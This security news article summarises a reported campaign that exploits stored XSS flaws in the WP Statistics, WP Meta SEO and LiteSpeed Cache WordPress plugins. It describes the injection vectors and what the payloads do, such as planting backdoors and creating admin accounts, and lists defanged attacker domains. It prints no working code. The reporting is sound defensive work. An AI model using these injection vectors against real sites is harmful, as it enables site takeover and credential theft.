In recent cyberattacks, hackers are taking advantage of stored cross-site scripting (XSS) vulnerabilities found in various WordPress plugins, as per reports from Fastly. The vulnerabilities identified as CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000 are being exploited due to insufficient input sanitization and output escaping, permitting attackers to inject malicious scripts.

The first plugin affected by this is the WP Statistics plugin, specifically versions 14.5 and below. This plugin is susceptible to stored cross-site scripting through the URL search parameter. This vulnerability enables unauthenticated attackers to inject arbitrary web scripts via the URL search parameter, which are then executed whenever a user accesses the injected page. The attacker ensures the payload is visible on the most visited pages by repeatedly sending requests containing the malicious script.

Secondly, the WP Meta SEO plugin, versions 4.5.12 and older, is also at risk of stored cross-site scripting attacks through the Referer HTTP header. By sending a payload to a target site, especially to a page that generates a 404 response, attackers can inject obfuscated JavaScript from a callback domain and execute it in the victim’s browser when an administrator loads the 404 & Redirects page.

Lastly, the LiteSpeed Cache plugin for WordPress, versions up to 5.7.0.1, is vulnerable to stored cross-site scripting via the ‘nameservers’ and ‘_msg’ parameters. Admins accessing backend pages unknowingly trigger this XSS vulnerability because the payload is disguised as an admin notification, leading to the execution of malicious scripts using their credentials for further nefarious activities.

In terms of the malicious JavaScript employed by these attackers, it carries out actions such as injecting PHP backdoors into plugin and theme files, creating new administrator accounts, and implementing tracking via Yandex. The PHP backdoors search for wp-loads.php files and insert scripts into wp-config.php, among other actions like creating new admin user credentials for unauthorized access.

Furthermore, different threat actors are linked to the exploitation of the identified vulnerabilities. Media.cdnstaticjs[.]com, idc.cloudiync[.]com, and other domains are utilized for attacks targeting CVE-2024-2194, CVE-2023-6961, and CVE-2023-40000. These attacks come from various IP addresses, with multiple requests attempting to exploit the vulnerabilities, particularly from AS202425 (IP Volume Inc.) and AS210848 (Telkom Internet LTD).

Domains like assets.scontentflow[.]com and cache.cloudswiftcdn[.]com are also associated with these attacks, where scripts are structured to backdoor infected sites. The indicators of compromise include multiple domains and IP addresses that are linked to the malicious activities observed.

In conclusion, the ongoing cyberattacks exploiting stored XSS vulnerabilities in WordPress plugins pose a serious threat to website security. It is essential for website administrators to update their plugins regularly and implement robust security measures to prevent such attacks from compromising their sites.

Source link